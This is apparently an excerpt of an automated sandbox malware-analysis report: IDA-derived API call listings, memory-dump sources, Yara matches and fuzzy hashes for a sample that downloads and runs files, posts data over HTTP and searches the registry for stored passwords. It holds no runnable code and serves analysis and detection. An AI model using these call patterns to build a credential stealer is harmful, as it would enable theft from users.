                                                • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                              • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 0040610F
                                              • StrCmpCA.SHLWAPI(?,02BEB110), ref: 00406147
                                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0040618F
                                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004061B3
                                              • InternetReadFile.WININET(a+A,?,00000400,?), ref: 004061DC
                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040620A
                                              • CloseHandle.KERNEL32(?,?,00000400), ref: 00406249
                                              • InternetCloseHandle.WININET(a+A), ref: 00406253
                                              • InternetCloseHandle.WININET(00000000), ref: 00406260
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                              • String ID: a+A$a+A
                                              • API String ID: 4287319946-2847607090
                                              • Opcode ID: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                                              • Instruction ID: d3b4a7caf446de9355e244355c8e16b321895ac976a44b0a7cc1b08be2cc8b72
                                              • Opcode Fuzzy Hash: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                                              • Instruction Fuzzy Hash: 735194B5940218ABDB20EF90DC45BEE77B9EB04305F1040ADB606B71C0DB786A85CF9A
                                              APIs
                                                • Part of subcall function 047FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 047FA9EF
                                              • memset.MSVCRT ref: 047F0E83
                                              • lstrcat.KERNEL32(?,00000000), ref: 047F0E9C
                                              • lstrcat.KERNEL32(?,00420D7C), ref: 047F0EAE
                                              • lstrcat.KERNEL32(?,00000000), ref: 047F0EC4
                                              • lstrcat.KERNEL32(?,00420D80), ref: 047F0ED6
                                              • lstrcat.KERNEL32(?,00000000), ref: 047F0EEF
                                              • lstrcat.KERNEL32(?,00420D84), ref: 047F0F01
                                              • lstrlen.KERNEL32(?), ref: 047F0F0E
                                              • memset.MSVCRT ref: 047F0F34
                                              • memset.MSVCRT ref: 047F0F48
                                                • Part of subcall function 047FAA87: lstrlen.KERNEL32(047E516C,?,?,047E516C,00420DDE), ref: 047FAA92
                                                • Part of subcall function 047FAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 047FAAEC
                                                • Part of subcall function 047F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,047E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FAC,00420E17), ref: 047F8DED
                                                • Part of subcall function 047FAB87: lstrcpy.KERNEL32(00000000,?), ref: 047FABD9
                                                • Part of subcall function 047FAB87: lstrcat.KERNEL32(00000000), ref: 047FABE9
                                                • Part of subcall function 047FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FAC,00420E17), ref: 047FAC2C
                                                • Part of subcall function 047FAC17: lstrcpy.KERNEL32(00000000), ref: 047FAC6B
                                                • Part of subcall function 047FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 047FAC79
                                                • Part of subcall function 047FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 047FAB6C
                                                • Part of subcall function 047FAA07: lstrcpy.KERNEL32(?,00000000), ref: 047FAA4D
                                                • Part of subcall function 047F9927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,047F0DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 047F9948
                                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 047F0FC1
                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 047F0FCD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                              • String ID:
                                              • API String ID: 1395395982-0
                                              • Opcode ID: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                              • Instruction ID: 74a38e71cf41b59b3305b99c369fa9633f633f4d4f6efb60454353828f9d92f6
                                              • Opcode Fuzzy Hash: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                              • Instruction Fuzzy Hash: AC8198B5950218ABDB24EBA0DD59FED7339AF44308F4041ADA30966381EF747B88CF59
                                              APIs
                                                • Part of subcall function 047FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 047FA9EF
                                              • memset.MSVCRT ref: 047F0E83
                                              • lstrcat.KERNEL32(?,00000000), ref: 047F0E9C
                                              • lstrcat.KERNEL32(?,00420D7C), ref: 047F0EAE
                                              • lstrcat.KERNEL32(?,00000000), ref: 047F0EC4
                                              • lstrcat.KERNEL32(?,00420D80), ref: 047F0ED6
                                              • lstrcat.KERNEL32(?,00000000), ref: 047F0EEF
                                              • lstrcat.KERNEL32(?,00420D84), ref: 047F0F01
                                              • lstrlen.KERNEL32(?), ref: 047F0F0E
                                              • memset.MSVCRT ref: 047F0F34
                                              • memset.MSVCRT ref: 047F0F48
                                                • Part of subcall function 047FAA87: lstrlen.KERNEL32(047E516C,?,?,047E516C,00420DDE), ref: 047FAA92
                                                • Part of subcall function 047FAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 047FAAEC
                                                • Part of subcall function 047F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,047E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FAC,00420E17), ref: 047F8DED
                                                • Part of subcall function 047FAB87: lstrcpy.KERNEL32(00000000,?), ref: 047FABD9
                                                • Part of subcall function 047FAB87: lstrcat.KERNEL32(00000000), ref: 047FABE9
                                                • Part of subcall function 047FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FAC,00420E17), ref: 047FAC2C
                                                • Part of subcall function 047FAC17: lstrcpy.KERNEL32(00000000), ref: 047FAC6B
                                                • Part of subcall function 047FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 047FAC79
                                                • Part of subcall function 047FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 047FAB6C
                                                • Part of subcall function 047FAA07: lstrcpy.KERNEL32(?,00000000), ref: 047FAA4D
                                                • Part of subcall function 047F9927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,047F0DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 047F9948
                                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 047F0FC1
                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 047F0FCD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                              • String ID:
                                              • API String ID: 1395395982-0
                                              • Opcode ID: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                              • Instruction ID: c16d3e92fb25c1310ecc54f37d8a80f6bcbc683d0298d0ff3ea137fa5d95d7f7
                                              • Opcode Fuzzy Hash: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                              • Instruction Fuzzy Hash: 3461D5B5910218ABDB24EBA0CD59FED7338AF44308F0041A9E70966381EF747B88CF59
                                              APIs
                                                • Part of subcall function 047FAA07: lstrcpy.KERNEL32(?,00000000), ref: 047FAA4D
                                                • Part of subcall function 047E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 047E4A51
                                                • Part of subcall function 047E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 047E4A68
                                                • Part of subcall function 047E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 047E4A7F
                                                • Part of subcall function 047E4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 047E4AA0
                                                • Part of subcall function 047E4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 047E4AB0
                                                • Part of subcall function 047FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 047FA9EF
                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 047E4B7C
                                              • StrCmpCA.SHLWAPI(?,0064A480), ref: 047E4BA1
                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 047E4D21
                                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,00421988,00000000,?,0064A514), ref: 047E504F
                                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 047E506B
                                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 047E507F
                                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 047E50B0
                                              • InternetCloseHandle.WININET(00000000), ref: 047E5114
                                              • InternetCloseHandle.WININET(00000000), ref: 047E512C
                                              • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 047E4D7C
                                                • Part of subcall function 047FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FAC,00420E17), ref: 047FAC2C
                                                • Part of subcall function 047FAC17: lstrcpy.KERNEL32(00000000), ref: 047FAC6B
                                                • Part of subcall function 047FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 047FAC79
                                                • Part of subcall function 047FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 047FAB6C
                                                • Part of subcall function 047FAB87: lstrcpy.KERNEL32(00000000,?), ref: 047FABD9
                                                • Part of subcall function 047FAB87: lstrcat.KERNEL32(00000000), ref: 047FABE9
                                              • InternetCloseHandle.WININET(00000000), ref: 047E5136
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                              • String ID:
                                              • API String ID: 2402878923-0
                                              • Opcode ID: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                              • Instruction ID: b3cde96018e1a2d2c8d9ff45146edddf047278b1aad3f768129ef14f320ca6dc
                                              • Opcode Fuzzy Hash: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                              • Instruction Fuzzy Hash: 1012C072910218ABDB15EB90DD65FEEB379BF55304F5041A9A20A62390EF743F88CF51
                                              APIs
                                                • Part of subcall function 047FAA07: lstrcpy.KERNEL32(?,00000000), ref: 047FAA4D
                                                • Part of subcall function 047E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 047E4A51
                                                • Part of subcall function 047E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 047E4A68
                                                • Part of subcall function 047E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 047E4A7F
                                                • Part of subcall function 047E4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 047E4AA0
                                                • Part of subcall function 047E4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 047E4AB0
                                                • Part of subcall function 047FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 047FA9EF
                                              • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 047E6548
                                              • StrCmpCA.SHLWAPI(?,0064A480), ref: 047E656A
                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 047E659C
                                              • HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 047E65EC
                                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 047E6626
                                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 047E6638
                                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 047E6664
                                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 047E66D4
                                              • InternetCloseHandle.WININET(00000000), ref: 047E6756
                                              • InternetCloseHandle.WININET(00000000), ref: 047E6760
                                              • InternetCloseHandle.WININET(00000000), ref: 047E676A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                              • String ID:
                                              • API String ID: 3074848878-0
                                              • Opcode ID: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                              • Instruction ID: 1f5cf67d724e8f3402b09f733ccb1fae50cedb3625f0131f5b39d9d3aafca54a
                                              • Opcode Fuzzy Hash: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                              • Instruction Fuzzy Hash: 8F716E75A40218EBEB24DFA0DC58BEE7775FB58700F504199E20A6B290DBB46A84CF41
                                              APIs
                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 047F92D3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateGlobalStream
                                              • String ID:
                                              • API String ID: 2244384528-0
                                              • Opcode ID: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                              • Instruction ID: b61150c9570702e4a6fb28c5d085f306038ce0a66bffec354d36f6c46a160587
                                              • Opcode Fuzzy Hash: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                              • Instruction Fuzzy Hash: 1D71EAB9A50208ABDB14DFE4DD88FEEB7B9FB59704F108108F615A7390DB34A904CB61
                                              APIs
                                              • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 004170DE
                                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • OpenProcess.KERNEL32(001FFFFF,00000000,0041730D,004205BD), ref: 0041711C
                                              • memset.MSVCRT ref: 0041716A
                                              • ??_V@YAXPAX@Z.MSVCRT(?), ref: 004172BE
                                              Strings
                                              • sA, xrefs: 004172AE, 00417179, 0041717C
                                              • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041718C
                                              • sA, xrefs: 00417111
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: OpenProcesslstrcpymemset
                                              • String ID: sA$sA$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                              • API String ID: 224852652-2614523144
                                              • Opcode ID: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                                              • Instruction ID: ffe5c4151d56689e238fca5affca6521033e0b5082b25a646ea50ffb364ad3ac
                                              • Opcode Fuzzy Hash: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                                              • Instruction Fuzzy Hash: 71515FB0D04218ABDB14EB91DD85BEEB774AF04304F1040AEE61576281EB786AC9CF5D
                                              APIs
                                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 047F77A9
                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 047F77E6
                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 047F786A
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 047F7871
                                              • wsprintfA.USER32 ref: 047F78A7
                                                • Part of subcall function 047FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 047FA9EF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                              • String ID: :$C$\$B
                                              • API String ID: 1544550907-183544611
                                              • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                              • Instruction ID: 8556cc09a67af7e34b82cd2af035978e699e2ff63c7ea31fd2599b3b2e9f8cb3
                                              • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                              • Instruction Fuzzy Hash: 664191B1D00258EFDB14DF94CC55BEEBBB9EF48704F000199E609A7380D7756A84CBA6
                                              APIs
                                                • Part of subcall function 004072D0: memset.MSVCRT ref: 00407314
                                                • Part of subcall function 004072D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                                • Part of subcall function 004072D0: RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                                • Part of subcall function 004072D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                                • Part of subcall function 004072D0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                                • Part of subcall function 004072D0: HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                              • lstrcatA.KERNEL32(00000000,004217FC,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?,?,004161C4), ref: 00407606
                                              • lstrcatA.KERNEL32(00000000,00000000,00000000), ref: 00407648
                                              • lstrcatA.KERNEL32(00000000, : ), ref: 0040765A
                                              • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040768F
                                              • lstrcatA.KERNEL32(00000000,00421804), ref: 004076A0
                                              • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004076D3
                                              • lstrcatA.KERNEL32(00000000,00421808), ref: 004076ED
                                              • task.LIBCPMTD ref: 004076FB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                              • String ID: :
                                              • API String ID: 3191641157-3653984579
                                              • Opcode ID: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                                              • Instruction ID: 32096a17696354d86885d8553091bec757242b1065822f319004c721f0fd16b2
                                              • Opcode Fuzzy Hash: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                                              • Instruction Fuzzy Hash: FE316B79E40109EFCB04FBE5DC85DEE737AFB49305B14542EE102B7290DA38A942CB66
                                              APIs
                                              • lstrcpy.KERNEL32(?,?), ref: 047F1642
                                                • Part of subcall function 047F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 047F9072
                                                • Part of subcall function 047F94C7: StrStrA.SHLWAPI(?,?), ref: 047F94D3
                                              • lstrcpy.KERNEL32(?,00000000), ref: 047F167E
                                                • Part of subcall function 047F94C7: lstrcpyn.KERNEL32(0064AB88,?,?), ref: 047F94F7
                                                • Part of subcall function 047F94C7: lstrlen.KERNEL32(?), ref: 047F950E
                                                • Part of subcall function 047F94C7: wsprintfA.USER32 ref: 047F952E
                                              • lstrcpy.KERNEL32(?,00000000), ref: 047F16C6
                                              • lstrcpy.KERNEL32(?,00000000), ref: 047F170E
                                              • lstrcpy.KERNEL32(?,00000000), ref: 047F1755
                                              • lstrcpy.KERNEL32(?,00000000), ref: 047F179D
                                              • lstrcpy.KERNEL32(?,00000000), ref: 047F17E5
                                              • lstrcpy.KERNEL32(?,00000000), ref: 047F182C
                                              • lstrcpy.KERNEL32(?,00000000), ref: 047F1874
                                                • Part of subcall function 047FAA87: lstrlen.KERNEL32(047E516C,?,?,047E516C,00420DDE), ref: 047FAA92
                                                • Part of subcall function 047FAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 047FAAEC
                                              • strtok_s.MSVCRT ref: 047F19B7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$lstrlen$FolderPathlstrcpynstrtok_swsprintf
                                              • String ID:
                                              • API String ID: 4276352425-0
                                              • Opcode ID: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                              • Instruction ID: c37a02cd586300f882e67dfa7bee42c72bad327c2b8033c739cfa3086eef7636
                                              • Opcode Fuzzy Hash: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                              • Instruction Fuzzy Hash: DE7156F5D50119ABDB14EBA0DC9CEEE7379AF64304F044998E30DA2340EA756B888F51
                                              APIs
                                              • memset.MSVCRT ref: 00407314
                                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                              • RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                              • HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                                • Part of subcall function 00409240: vsprintf_s.MSVCRT ref: 0040925B
                                              • task.LIBCPMTD ref: 00407555
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                              • String ID: Password
                                              • API String ID: 2698061284-3434357891
                                              • Opcode ID: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                              • Instruction ID: ef12ebdd473109685825b75701b45193a1214ac884297e43e73859b9717fa869
                                              • Opcode Fuzzy Hash: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                              • Instruction Fuzzy Hash: B8614DB5D0416C9BDB24DB50CD41BDAB7B8BF44304F0081EAE689A6281DB746FC9CFA5
                                              APIs
                                              • lstrcatA.KERNEL32(?,02BE97A8,?,00000104,?,00000104,?,00000104,?,00000104), ref: 004147DB
                                                • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                              • lstrcatA.KERNEL32(?,00000000), ref: 00414801
                                              • lstrcatA.KERNEL32(?,?), ref: 00414820
                                              • lstrcatA.KERNEL32(?,?), ref: 00414834
                                              • lstrcatA.KERNEL32(?,02BB5948), ref: 00414847
                                              • lstrcatA.KERNEL32(?,?), ref: 0041485B
                                              • lstrcatA.KERNEL32(?,02BE9D48), ref: 0041486F
                                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                                • Part of subcall function 00414570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                                • Part of subcall function 00414570: HeapAlloc.KERNEL32(00000000), ref: 00414587
                                                • Part of subcall function 00414570: wsprintfA.USER32 ref: 004145A6
                                                • Part of subcall function 00414570: FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                              • String ID: 0aA
                                              • API String ID: 167551676-2786531170
                                              • Opcode ID: c41430eb4feb1aa100886eeb9410b758f6c3d0d9cc64a6702e2d15a1bac7c1b5
                                              • Instruction ID: 67fb29d5a8d89bc8d31ec604eacddc75011aa0e27ff4711df2ee94280de74797
                                              • Opcode Fuzzy Hash: c41430eb4feb1aa100886eeb9410b758f6c3d0d9cc64a6702e2d15a1bac7c1b5
